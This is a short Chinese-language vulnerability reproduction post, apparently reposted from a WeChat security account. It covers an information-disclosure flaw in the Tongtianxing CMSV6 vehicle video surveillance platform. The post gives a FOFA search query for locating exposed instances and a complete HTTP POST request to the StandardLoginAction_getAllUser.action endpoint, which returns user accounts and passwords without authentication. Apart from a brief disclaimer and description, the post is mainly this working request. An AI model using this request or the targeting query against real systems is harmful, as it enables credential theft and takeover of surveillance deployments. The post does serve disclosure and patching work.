【漏洞复现】通天星CMSV6-车载视频监控平台存在信息泄露漏洞

admin 2024年2月24日22:20:47评论86 views字数 495阅读1分39秒阅读模式

免责声明

使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。

漏洞描述

通天星CMSV6车载视频监控平台StandardLoginAction_getAllUser.action接口处存在信息泄露漏洞,未经身份认证的攻击者可以通过此漏洞获取系统内部账户密码等敏感信息,登录后台,使系统处于极不安全状态。

资产测绘

FOFA:body="/808gps/"

漏洞复现

POST /808gps/StandardLoginAction_getAllUser.action HTTP/1.1
Host: your-ip
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

json=null

 

 


原文始发于微信公众号(漏洞文库):【漏洞复现】通天星CMSV6-车载视频监控平台存在信息泄露漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月24日22:20:47
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【漏洞复现】通天星CMSV6-车载视频监控平台存在信息泄露漏洞https://cn-sec.com/archives/2522590.html

发表评论

匿名网友 填写信息